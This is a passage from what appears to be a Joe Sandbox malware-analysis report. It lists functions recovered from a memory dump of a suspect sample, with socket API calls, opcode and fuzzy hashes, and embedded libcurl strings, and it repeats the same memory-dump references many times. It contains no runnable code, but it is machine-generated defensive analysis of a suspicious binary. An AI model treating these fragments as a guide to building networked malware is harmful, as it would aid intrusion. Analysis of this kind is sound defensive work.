                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: gethostname
                                                • String ID:
                                                • API String ID: 144339138-0
                                                • Opcode ID: cbcdc130ba5c1142a3f2206a0a6913bf13d48f5ca588624d8f69c520991abf84
                                                • Instruction ID: df9c52d807a612c939c3ef293aec17e00a2c8366d556fab57466b2cf3e89fb1f
                                                • Opcode Fuzzy Hash: cbcdc130ba5c1142a3f2206a0a6913bf13d48f5ca588624d8f69c520991abf84
                                                • Instruction Fuzzy Hash: A551B1F06047009BE7309B25EE49B6776E4EF41319F18183DEA8E866D1E775E844CB72
                                                Function 00D1AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                • getsockname.WS2_32(?,?,00000080), ref: 00D1AFD1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: getsockname
                                                • String ID:
                                                • API String ID: 3358416759-0
                                                • Opcode ID: 0e32a67a8aa4173051e9331133e5b7c191ee46711b839edaca47405f1d2cb57b
                                                • Instruction ID: 0fc10a750870c05bc9c96b54437f741882c717f980ef63b329d81ef3ea333cc2
                                                • Opcode Fuzzy Hash: 0e32a67a8aa4173051e9331133e5b7c191ee46711b839edaca47405f1d2cb57b
                                                • Instruction Fuzzy Hash: 6911D670808785A5EB268F1CD4027F6B3F4EFD4328F109A19F5D942150FB329AC68BD2
                                                Function 00D1A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • send.WS2_32(?,?,?,00000000,00000000,?), ref: 00D1A97F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: send
                                                • String ID:
                                                • API String ID: 2809346765-0
                                                • Opcode ID: 0781a4c4f7b22f200f48d2004a4c9280ef64b181ac55c885379afe3e80ab28bc
                                                • Instruction ID: 69ef839d9d40dd600fb7c86398214c10b271c12538d986b53857b15a90d6c188
                                                • Opcode Fuzzy Hash: 0781a4c4f7b22f200f48d2004a4c9280ef64b181ac55c885379afe3e80ab28bc
                                                • Instruction Fuzzy Hash: 5A01A776B01710AFC6148F18E845B96B7A5EF84720F4A8559EA981B361C331AC508FE1
                                                Function 00D1AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WS2_32(?,00D1B280,00000000,-00000001,00000000,00D1B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00D1AF66
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: socket
                                                • String ID:
                                                • API String ID: 98920635-0
                                                • Opcode ID: ff33f030c2036a4f0070b9d16a7adb65735617f8fa840de396acda77530a1aa9
                                                • Instruction ID: befbc41b22e4c8cef0a499888e12d1215b281d5f88d21948d5aa9a03291c2afa
                                                • Opcode Fuzzy Hash: ff33f030c2036a4f0070b9d16a7adb65735617f8fa840de396acda77530a1aa9
                                                • Instruction Fuzzy Hash: 1BE0EDB2A052216BD6649B5CF844AABF3A9EFC4B20F054A49BC5463204C730AC518BF2
                                                Function 00D1B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • closesocket.WS2_32(?,00D19422,?,?,?,?,?,?,?,?,?,?,?,00D03377,01111280,00000000), ref: 00D1B04C
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: closesocket
                                                • String ID:
                                                • API String ID: 2781271927-0
                                                • Opcode ID: 06ab18c360fc02baa6579ced7913d709ab641b4110ba88bc976057f60a044707
                                                • Instruction ID: 80aca5cd42317e98ae64fecf6254e4e979a8a73b397dd13c71f3c74a44ed23b3
                                                • Opcode Fuzzy Hash: 06ab18c360fc02baa6579ced7913d709ab641b4110ba88bc976057f60a044707
                                                • Instruction Fuzzy Hash: A5D0C23070020067CA248A14D884A87772B7FC6720F2CCF6CE42C8A155CF3BCC838611
                                                Function 00CB67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                Download Yara Rule
                                                APIs
                                                • ioctlsocket.WS2_32(?,8004667E,?,?,00C8AF56,?,00000001), ref: 00CB67FB
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: ioctlsocket
                                                • String ID:
                                                • API String ID: 3577187118-0
                                                • Opcode ID: 8104bf5a029d92dd909d08da81dcbb916d3578f3be111cd6f54001ce606b99b7
                                                • Instruction ID: 66806cfb78524afff404ec24cd778485ada8519ee7a2de58543acfda5f00e555
                                                • Opcode Fuzzy Hash: 8104bf5a029d92dd909d08da81dcbb916d3578f3be111cd6f54001ce606b99b7
                                                • Instruction Fuzzy Hash: 65C012F1209201AFC60C4724D855B2EB6D9DB44255F01491CB04692180EA349450CB16
                                                Function 00C531D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: d22b0121c50680622828037f6a1283182d2f1894a763a37c4d4510774081db41
                                                • Instruction ID: 9b64ff9125fc0272458455983f2633fcc17f66786ca2c51af9108830d4963329
                                                • Opcode Fuzzy Hash: d22b0121c50680622828037f6a1283182d2f1894a763a37c4d4510774081db41
                                                • Instruction Fuzzy Hash: 5631C5B4D047059FCB04EFB8DA8469EBBF4AF44344F00896DE898A7340E7749A84DF92

                                                Non-executed Functions

                                                Function 00C91BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                • API String ID: 0-1371176463
                                                • Opcode ID: 041103b997eda224eaa50e4d4fdf3963b975a84aee60bebde64b8119eae7b346
                                                • Instruction ID: 99132f4a82b7aabb3b4f289607c1fa6bb031b10d98b20310f903fe02e6b3d306
                                                • Opcode Fuzzy Hash: 041103b997eda224eaa50e4d4fdf3963b975a84aee60bebde64b8119eae7b346
                                                • Instruction Fuzzy Hash: F7B24675A08341BBEF219A25DC4AB267BD4AF40344F08862CFDDD96283E771EE84D752
                                                Function 00C64940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                • API String ID: 0-122532811
                                                • Opcode ID: 5fd9e93416c201d9aa5c96997dbf5821ada36b587cb55fe2848bb295fdff1aed
                                                • Instruction ID: 1f86b57978be27ce77ea300deb59d458e5bdf4f1d57615704ed93fa267836bbc
                                                • Opcode Fuzzy Hash: 5fd9e93416c201d9aa5c96997dbf5821ada36b587cb55fe2848bb295fdff1aed
                                                • Instruction Fuzzy Hash: B74206B1B08700AFD718DE28CC81B6BB6EAEFC4700F148A2CF55D97391D775A9149B92
                                                Function 00D09880 Relevance: 15.2, Strings: 12, Instructions: 226COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                                • API String ID: 0-1574211403
                                                • Opcode ID: 497e43de235f08feb2085e8d64ee817c788c0dfd461a7bf715b33897ef905706
                                                • Instruction ID: 7d61c532ac25d00f6579a1b84b580f546dada36da9ccf8fde863560652253d20
                                                • Opcode Fuzzy Hash: 497e43de235f08feb2085e8d64ee817c788c0dfd461a7bf715b33897ef905706
                                                • Instruction Fuzzy Hash: DB61C7A5A0830067E714A620BC62B7BF299DB95314F08883DFC8E962D3FE75D954C273
                                                Function 00C74F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                • API String ID: 0-1914377741
                                                • Opcode ID: 8b5b25872994a990e7950c96618dd241157811f618a27e1224d1880461e82ea7
                                                • Instruction ID: f8544dd212277201557d2ff41911e4ae80f1946a495c301fb10147ba4130c501
